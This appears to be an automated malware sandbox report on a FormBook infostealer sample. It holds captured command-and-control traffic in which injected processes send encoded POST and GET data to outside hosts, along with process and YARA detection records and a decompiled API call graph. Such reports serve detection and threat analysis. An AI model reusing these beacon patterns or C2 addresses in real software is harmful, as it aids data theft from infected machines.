                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 31 44 4c 64 38 61 71 70 6c 71 33 6f 5a 4f 2b 64 42 54 56 43 79 6b 62 34 69 61 75 56 44 4b 55 61 45 39 41 48 54 51 71 44 53 2b 2f 6c 72 52 70 6d 70 46 37 46 31 38 6f 4e 56 4b 46 4f 61 64 75 73 72 4c 58 45 53 38 58 61 58 43 46 68 4e 37 4f 31 71 39 75 6c 73 77 57 66 53 5a 51 5a 47 66 47 4f 52 43 68 54 6b 67 53 4b 70 4e 37 59 64 2f 54 64 53 45 4c 62 61 66 49 76 52 62 4f 53 47 33 6b 77 57 57 55 49 71 43 52 6d 5a 37 49 64 37 54 69 72 4b 50 38 73 49 57 31 48 33 6b 43 67 48 78 30 5a 37 58 6c 76 37 67 30 51 2b 4c 6f 61 36 69 2b 64 38 73 78 57 38 77 63 70 50 75 75 34 72 48 50 56 36 35 41 6c 39 6f 54 47 38 45 2f 68 45 59 4d 47 2b 57 53 4b 34 65 62 68 71 7a 36 63 38 62 33 38 77 4f 41 4d 4d 4d 76 4e 6a 31 64 6e 38 63 5a 45 5a 47 37 71 6c 54 52 31 4b 57 77 58 6d 68 68 36 4d 74 44 41 34 58 55 55 44 39 6d 46 6d 54 35 62 6b 4c 4f 2b 33 4f 54 58 4c 46 37 70 38 68 67 66 63 63 64 4b 70 65 4a 31 68 79 39 77 6f 59 34 6f 34 7a 4f 67 47 39 41 37 2b 30 54 69 54 32 6e 56 35 61 74 4b 4d 41 4d 4e 63 [TRUNCATED]
                                                              Data Ascii: jp30l4Dh= [TRUNCATED]
                                                              Nov 24, 2024 08:36:29.126285076 CET  367  IN  HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Sun, 24 Nov 2024 07:36:27 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Encoding: gzip
                                                              Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                              24          192.168.2.7  49996        185.106.208.3   80                520  C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Nov 24, 2024 08:36:30.421518087 CET  458                OUT        GET /oeev/?Yh8=pl0prhRpj&jp30l4Dh=4Bj9/uaylYDlcNOhP3Vjy2LihZ6nT7QmD+N2KgHLZ82DvRBjhSjv88Mhc+F1FP6p7OjlEaHQXhlUBbSPr8yFpnLDL5BtGuLJV14GqWSwkNfFdanhR1yYduJIVu+RZBYfQm093zpAcY8s HTTP/1.1
                                                              Host: www.holytur.net
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Nov 24, 2024 08:36:31.806364059 CET  706  IN  HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Sun, 24 Nov 2024 07:36:30 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Content-Length: 548
                                                              Connection: close
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                              25          192.168.2.7  49997        13.248.169.48   80                520  C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Nov 24, 2024 08:36:37.375343084 CET  716                OUT        POST /qp0h/ HTTP/1.1
                                                              Host: www.lirio.shop
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.lirio.shop
                                                              Referer: http://www.lirio.shop/qp0h/
                                                              Content-Length: 221
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Ascii: jp30l4Dh=CWi2LxdIHyDkgilx/lRZb1exApMuXvxaa9hw0Eyfw1H/6/k79CoVbDWT5MTkngYRyew9H2wweINdrXYhJoyyHdrrV+smV19glf9XGFf+DiYGTi9Kj35KaDlD/0doqXhgbzFlDcYM3GYugFq7y8uw88cyP0OvIHhtTCjvk32Peq+A+zPrMOmzUm/uVJe4FKO2c31rUsxfLDDtrPJ3OQ==


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                              26          192.168.2.7  49998        13.248.169.48   80                520  C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Nov 24, 2024 08:36:40.039668083 CET  736                OUT        POST /qp0h/ HTTP/1.1
                                                              Host: www.lirio.shop
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.lirio.shop
                                                              Referer: http://www.lirio.shop/qp0h/
                                                              Content-Length: 241
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Ascii: jp30l4Dh=CWi2LxdIHyDkiC1x9G5ZcVe+KJMuePxea9dw0GfYwGv//ts78AAVaDWTg8T8qAYgyesfHy4weIZdrVQhJ5y9HNrpdeskfV9glf9XGGi2DiQGTxlKs0hLZDlC80dog3gpbzFLDZ5Z3EQugFa71tuz28cwSEPuLXECXRDr80GhHKLmylOJWsqfK3HVRL6OSsTDe2xzZOF+U0mHmdozYkI61eIOww4xQC4c9Btl4BY=


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                              27          192.168.2.7  49999        13.248.169.48   80                520  C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Nov 24, 2024 08:36:42.708466053 CET  1749               OUT        POST /qp0h/ HTTP/1.1
                                                              Host: www.lirio.shop
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.lirio.shop
                                                              Referer: http://www.lirio.shop/qp0h/
                                                              Content-Length: 1253
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 43 57 69 32 4c 78 64 49 48 79 44 6b 69 43 31 78 39 47 35 5a 63 56 65 2b 4b 4a 4d 75 65 50 78 65 61 39 64 77 30 47 66 59 77 47 33 2f 2f 34 67 37 39 6e 30 56 5a 44 57 54 6f 63 54 6f 71 41 59 48 79 65 30 62 48 79 31 46 65 4e 64 64 72 77 45 68 59 62 4b 39 55 74 72 70 52 2b 73 6e 56 31 39 51 6c 66 4e 54 47 47 79 32 44 69 51 47 54 33 4a 4b 6f 6e 35 4c 66 44 6c 44 2f 30 64 65 71 58 67 42 62 7a 63 32 44 5a 31 4a 32 33 49 75 6a 6c 4b 37 33 66 47 7a 73 38 63 2b 54 45 4f 39 4c 58 34 64 58 52 50 64 38 31 79 4c 48 4e 2f 6d 78 44 50 7a 4e 4e 4b 77 4a 58 62 4a 5a 64 6d 33 58 74 44 55 47 33 68 78 63 73 4a 59 49 6c 36 6c 76 75 51 51 56 43 68 59 6e 65 34 61 72 43 55 57 42 30 42 30 70 55 70 35 74 30 76 35 72 58 48 2b 76 4c 53 59 4d 6a 4f 71 36 6f 39 78 38 53 69 44 30 38 52 6e 30 47 43 31 73 36 34 36 4b 62 74 75 35 77 2f 6a 55 51 68 2b 67 47 2b 56 54 58 72 37 4d 66 73 46 42 6e 30 68 34 6d 47 6d 51 59 61 69 6a 64 73 74 34 43 64 64 37 47 66 76 75 37 56 57 6d 6b 62 61 45 42 6d 53 38 49 67 59 50 [TRUNCATED]
                                                              Data Ascii: jp30l4Dh= [TRUNCATED]


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                              28          192.168.2.7  50000        13.248.169.48   80                520  C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Nov 24, 2024 08:36:45.363579988 CET  457                OUT        GET /qp0h/?jp30l4Dh=PUKWIHREPS7WoV9Y7jBwDAi8MdJvbPlJZ9RV9HOL13mBnPAwzQgZHDWQnYS4lWYAxPM5HQ5Ne4pDukEiRp2IEMb3TN5ZVyBIh4N3fT3PNmVkN2Qc3E0TfDZCxTFFsCUQYSNOCPRw5FgL&Yh8=pl0prhRpj HTTP/1.1
                                                              Host: www.lirio.shop
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Nov 24, 2024 08:36:46.501184940 CET  418  IN  HTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Sun, 24 Nov 2024 07:36:46 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 278
                                                              Connection: close
                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?jp30l4Dh=PUKWIHREPS7WoV9Y7jBwDAi8MdJvbPlJZ9RV9HOL13mBnPAwzQgZHDWQnYS4lWYAxPM5HQ5Ne4pDukEiRp2IEMb3TN5ZVyBIh4N3fT3PNmVkN2Qc3E0TfDZCxTFFsCUQYSNOCPRw5FgL&Yh8=pl0prhRpj"}</script></head></html>


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                              29          192.168.2.7  50001        3.33.130.190    80                520  C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Nov 24, 2024 08:36:52.163058996 CET  734                OUT        POST /4knb/ HTTP/1.1
                                                              Host: www.espiritismo.info
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.espiritismo.info
                                                              Referer: http://www.espiritismo.info/4knb/
                                                              Content-Length: 221
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Ascii: jp30l4Dh=pEJ8/ou9Iio6g7s1C1xtw33L7uwk56Xi7wmoOuKjf29dsOvWRwUTQzmAROZdxPuVikDhvLoGSO5uz1UKbHAay3GFUiHM9pdhVCNQXlOD2XO8OP3dS8L32hlqKMIkuh1Pm83lhy5pBb5OP7wy5MBrNPmOumd6CviMRtBBPx/25lj57DVOBS9Lb109pbniwJmGAXdCxdznwdjJsIFCgA==


                                                              Target ID:0
                                                              Start time:02:33:45
                                                              Start date:24/11/2024
                                                              Path:C:\Users\user\Desktop\santi.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\santi.exe"
                                                              Imagebase:0x2e0000
                                                              File size:1'214'464 bytes
                                                              MD5 hash:C086DE804062F1C6EBF2E42057187B24
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:7
                                                              Start time:02:33:46
                                                              Start date:24/11/2024
                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\santi.exe"
                                                              Imagebase:0xb20000
                                                              File size:46'504 bytes
                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1716707325.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1717464893.0000000005D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1716909243.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:10
                                                              Start time:03:50:27
                                                              Start date:24/11/2024
                                                              Path:C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe"
                                                              Imagebase:0x9c0000
                                                              File size:140'800 bytes
                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3132089430.00000000051D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:11
                                                              Start time:03:50:28
                                                              Start date:24/11/2024
                                                              Path:C:\Windows\SysWOW64\msdt.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\msdt.exe"
                                                              Imagebase:0x850000
                                                              File size:389'632 bytes
                                                              MD5 hash:BAA4458E429E7C906560FE4541ADFCFB
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3128767729.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3131908170.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3132346426.0000000004240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:moderate
                                                              Has exited:false

                                                              Target ID:12
                                                              Start time:03:50:43
                                                              Start date:24/11/2024
                                                              Path:C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe"
                                                              Imagebase:0x9c0000
                                                              File size:140'800 bytes
                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3132349262.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:16
                                                              Start time:03:50:56
                                                              Start date:24/11/2024
                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                              Imagebase:0x7ff722870000
                                                              File size:676'768 bytes
                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true


                                                                Execution Graph

                                                                Execution Coverage:3.4%
                                                                Dynamic/Decrypted Code Coverage:2%
                                                                Signature Coverage:8.3%
                                                                Total number of Nodes:1809
                                                                Total number of Limit Nodes:155
92511->92522 92523 307c0e 47 API calls __getptd_noexit 92514->92523 92516->92497 92517->92500 92518->92502 92519->92510 92520->92510 92522->92514 92523->92516 92524->92516 92526 2e5381 GetModuleFileNameW 92525->92526 92526->92448 92528 30f8a0 __ftell_nolock 92527->92528 92529 2e661c GetFullPathNameW 92528->92529 92534 2e6a63 92529->92534 92531 2e6643 92545 2e6571 92531->92545 92535 2e6adf 92534->92535 92538 2e6a6f __NMSG_WRITE 92534->92538 92560 2eb18b 92535->92560 92537 2e6ab6 ___crtGetEnvironmentStringsW 92537->92531 92539 2e6a8b 92538->92539 92540 2e6ad7 92538->92540 92549 2e6b4a 48 API calls 92539->92549 92559 2ec369 48 API calls 92540->92559 92543 2e6a95 92550 2fee75 92543->92550 92546 2e657f 92545->92546 92547 2eb18b 48 API calls 92546->92547 92548 2e658f 92547->92548 92548->92451 92549->92543 92552 2ff4ea __calloc_impl 92550->92552 92551 30395c __crtGetStringTypeA_stat 47 API calls 92551->92552 92552->92551 92553 2ff50c 92552->92553 92554 2ff50e std::exception::exception 92552->92554 92553->92537 92564 306805 RaiseException 92554->92564 92556 2ff538 92565 30673b 47 API calls _free 92556->92565 92558 2ff54a 92558->92537 92559->92537 92561 2eb199 92560->92561 92563 2eb1a2 ___crtGetEnvironmentStringsW 92560->92563 92561->92563 92566 2ebdfa 92561->92566 92563->92537 92564->92556 92565->92558 92567 2ebe0d 92566->92567 92571 2ebe0a ___crtGetEnvironmentStringsW 92566->92571 92568 2ff4ea 48 API calls 92567->92568 92569 2ebe17 92568->92569 92570 2fee75 48 API calls 92569->92570 92570->92571 92571->92563 92573 2e368a 92572->92573 92573->92455 92575 2e513f __NMSG_WRITE 92574->92575 92576 351b27 92575->92576 92577 2e5151 92575->92577 92590 2e6b4a 48 API calls 92576->92590 92585 2ebb85 92577->92585 92580 2e515e ___crtGetEnvironmentStringsW 92580->92464 92581 351b34 92582 2fee75 48 API calls 92581->92582 92583 351b57 ___crtGetEnvironmentStringsW 92582->92583 92584->92465 92586 2ebb9b 92585->92586 92589 2ebb96 ___crtGetEnvironmentStringsW 92585->92589 92587 351b77 
92586->92587 92588 2fee75 48 API calls 92586->92588 92588->92589 92589->92580 92590->92581 92592 2ebce8 92591->92592 92596 2e4a0a RegOpenKeyExW 92591->92596 92593 2ff4ea 48 API calls 92592->92593 92594 2ebcf2 92593->92594 92595 2fee75 48 API calls 92594->92595 92595->92596 92596->92477 92596->92478 92598 2ff4ea 48 API calls 92597->92598 92599 2e47c9 RegQueryValueExW 92598->92599 92599->92485 92599->92486 92600 e178cb 92601 e178d2 92600->92601 92602 e17970 92601->92602 92603 e178da 92601->92603 92620 e18220 9 API calls 92602->92620 92607 e17580 92603->92607 92606 e17957 92608 e14f70 GetPEB 92607->92608 92611 e1761f 92608->92611 92610 e17650 CreateFileW 92610->92611 92617 e1765d 92610->92617 92612 e17679 VirtualAlloc 92611->92612 92611->92617 92618 e17780 CloseHandle 92611->92618 92619 e17790 VirtualFree 92611->92619 92621 e18490 GetPEB 92611->92621 92613 e1769a ReadFile 92612->92613 92612->92617 92616 e176b8 VirtualAlloc 92613->92616 92613->92617 92614 e1787a 92614->92606 92615 e1786c VirtualFree 92615->92614 92616->92611 92616->92617 92617->92614 92617->92615 92618->92611 92619->92611 92620->92606 92622 e184ba 92621->92622 92622->92610 92623 2e3742 92624 2e374b 92623->92624 92625 2e37c8 92624->92625 92626 2e3769 92624->92626 92664 2e37c6 92624->92664 92628 2e37ce 92625->92628 92629 351e00 92625->92629 92630 2e382c PostQuitMessage 92626->92630 92631 2e3776 92626->92631 92627 2e37ab DefWindowProcW 92657 2e37b9 92627->92657 92632 2e37f6 SetTimer RegisterWindowMessageW 92628->92632 92633 2e37d3 92628->92633 92678 2e2ff6 16 API calls 92629->92678 92630->92657 92635 351e88 92631->92635 92636 2e3781 92631->92636 92640 2e381f CreatePopupMenu 92632->92640 92632->92657 92637 2e37da KillTimer 92633->92637 92638 351da3 92633->92638 92684 324ddd 60 API calls _memset 92635->92684 92641 2e3789 92636->92641 92642 2e3836 92636->92642 92675 2e3847 Shell_NotifyIconW _memset 92637->92675 92644 351ddc MoveWindow 92638->92644 92645 351da8 92638->92645 92639 351e27 92679 2fe312 346 API 
calls Mailbox 92639->92679 92640->92657 92648 351e6d 92641->92648 92649 2e3794 92641->92649 92668 2feb83 92642->92668 92644->92657 92652 351dac 92645->92652 92653 351dcb SetFocus 92645->92653 92648->92627 92683 31a5f3 48 API calls 92648->92683 92655 2e379f 92649->92655 92656 351e58 92649->92656 92650 351e9a 92650->92627 92650->92657 92652->92655 92658 351db5 92652->92658 92653->92657 92654 2e37ed 92676 2e390f DeleteObject DestroyWindow Mailbox 92654->92676 92655->92627 92680 2e3847 Shell_NotifyIconW _memset 92655->92680 92682 3255bd 70 API calls _memset 92656->92682 92677 2e2ff6 16 API calls 92658->92677 92663 351e68 92663->92657 92664->92627 92666 351e4c 92681 2e4ffc 67 API calls _memset 92666->92681 92669 2fec1c 92668->92669 92670 2feb9a _memset 92668->92670 92669->92657 92685 2e51af 92670->92685 92672 2fec05 KillTimer SetTimer 92672->92669 92673 2febc1 92673->92672 92674 353c7a Shell_NotifyIconW 92673->92674 92674->92672 92675->92654 92676->92657 92677->92657 92678->92639 92679->92655 92680->92666 92681->92664 92682->92663 92683->92664 92684->92650 92686 2e51cb 92685->92686 92687 2e52a2 Mailbox 92685->92687 92707 2e6b0f 48 API calls 92686->92707 92687->92673 92689 2e51d9 92690 353ca1 LoadStringW 92689->92690 92691 2e51e6 92689->92691 92694 353cbb 92690->92694 92692 2e6a63 48 API calls 92691->92692 92693 2e51fb 92692->92693 92693->92694 92695 2e520c 92693->92695 92696 2e510d 48 API calls 92694->92696 92697 2e5216 92695->92697 92698 2e52a7 92695->92698 92701 353cc5 92696->92701 92708 2e510d 92697->92708 92717 2e6eed 92698->92717 92702 2e518c 48 API calls 92701->92702 92704 2e5220 _memset _wcscpy 92701->92704 92703 353ce7 92702->92703 92706 2e518c 48 API calls 92703->92706 92705 2e5288 Shell_NotifyIconW 92704->92705 92705->92687 92706->92704 92707->92689 92709 2e511f 92708->92709 92710 351be7 92708->92710 92721 2eb384 92709->92721 92730 31a58f 48 API calls ___crtGetEnvironmentStringsW 92710->92730 92713 2e512b 92713->92704 92714 351bf1 92715 2e6eed 48 API calls 
92714->92715 92716 351bf9 Mailbox 92715->92716 92718 2e6ef8 92717->92718 92719 2e6f00 92717->92719 92731 2edd47 48 API calls ___crtGetEnvironmentStringsW 92718->92731 92719->92704 92722 2eb392 92721->92722 92727 2eb3c5 ___crtGetEnvironmentStringsW 92721->92727 92723 2eb3fd 92722->92723 92724 2eb3b8 92722->92724 92722->92727 92725 2ff4ea 48 API calls 92723->92725 92726 2ebb85 48 API calls 92724->92726 92728 2eb407 92725->92728 92726->92727 92727->92713 92729 2ff4ea 48 API calls 92728->92729 92729->92727 92730->92714 92731->92719 92732 358eb8 92736 32a635 92732->92736 92734 358ec3 92735 32a635 84 API calls 92734->92735 92735->92734 92737 32a66f 92736->92737 92742 32a642 92736->92742 92737->92734 92738 32a671 92768 2fec4e 81 API calls 92738->92768 92740 32a676 92747 2e936c 92740->92747 92742->92737 92742->92738 92742->92740 92745 32a669 92742->92745 92743 32a67d 92744 2e510d 48 API calls 92743->92744 92744->92737 92767 2f4525 61 API calls ___crtGetEnvironmentStringsW 92745->92767 92748 2e9384 92747->92748 92765 2e9380 92747->92765 92749 2e93b0 __itow Mailbox _wcscpy 92748->92749 92750 354cbd __i64tow 92748->92750 92751 2e9398 92748->92751 92752 354bbf 92748->92752 92755 2ff4ea 48 API calls 92749->92755 92769 30172b 80 API calls 4 library calls 92751->92769 92753 354ca5 92752->92753 92758 354bc8 92752->92758 92770 30172b 80 API calls 4 library calls 92753->92770 92757 2e93ba 92755->92757 92761 2ece19 48 API calls 92757->92761 92757->92765 92758->92749 92759 354be7 92758->92759 92760 2ff4ea 48 API calls 92759->92760 92762 354c04 92760->92762 92761->92765 92763 2ff4ea 48 API calls 92762->92763 92764 354c2a 92763->92764 92764->92765 92766 2ece19 48 API calls 92764->92766 92765->92743 92766->92765 92767->92737 92768->92740 92769->92749 92770->92749 92771 305dfd 92772 305e09 type_info::_Type_info_dtor 92771->92772 92808 307eeb GetStartupInfoW 92772->92808 92774 305e0e 92810 309ca7 GetProcessHeap 92774->92810 92776 305e66 92777 305e71 92776->92777 92895 305f4d 47 API calls 3 
library calls 92776->92895 92811 307b47 92777->92811 92780 305e77 92781 305e82 __RTC_Initialize 92780->92781 92896 305f4d 47 API calls 3 library calls 92780->92896 92832 30acb3 92781->92832 92784 305e91 92785 305e9d GetCommandLineW 92784->92785 92897 305f4d 47 API calls 3 library calls 92784->92897 92851 312e7d GetEnvironmentStringsW 92785->92851 92788 305e9c 92788->92785 92792 305ec2 92864 312cb4 92792->92864 92795 305ec8 92796 305ed3 92795->92796 92899 30115b 47 API calls 3 library calls 92795->92899 92878 301195 92796->92878 92799 305edb 92800 305ee6 __wwincmdln 92799->92800 92900 30115b 47 API calls 3 library calls 92799->92900 92882 2e3a0f 92800->92882 92803 305efa 92804 305f09 92803->92804 92901 3013f1 47 API calls _doexit 92803->92901 92902 301186 47 API calls _doexit 92804->92902 92807 305f0e type_info::_Type_info_dtor 92809 307f01 92808->92809 92809->92774 92810->92776 92903 30123a 30 API calls 2 library calls 92811->92903 92813 307b4c 92904 307e23 InitializeCriticalSectionAndSpinCount 92813->92904 92815 307b51 92816 307b55 92815->92816 92906 307e6d TlsAlloc 92815->92906 92905 307bbd 50 API calls 2 library calls 92816->92905 92819 307b5a 92819->92780 92820 307b67 92820->92816 92821 307b72 92820->92821 92907 306986 92821->92907 92824 307bb4 92915 307bbd 50 API calls 2 library calls 92824->92915 92827 307bb9 92827->92780 92828 307b93 92828->92824 92829 307b99 92828->92829 92914 307a94 47 API calls 4 library calls 92829->92914 92831 307ba1 GetCurrentThreadId 92831->92780 92833 30acbf type_info::_Type_info_dtor 92832->92833 92924 307cf4 92833->92924 92835 30acc6 92836 306986 __calloc_crt 47 API calls 92835->92836 92837 30acd7 92836->92837 92838 30ad42 GetStartupInfoW 92837->92838 92839 30ace2 type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 92837->92839 92846 30ae80 92838->92846 92848 30ad57 92838->92848 92839->92784 92840 30af44 92931 30af58 LeaveCriticalSection _doexit 92840->92931 92842 30ada5 92842->92846 92849 30ade5 InitializeCriticalSectionAndSpinCount 
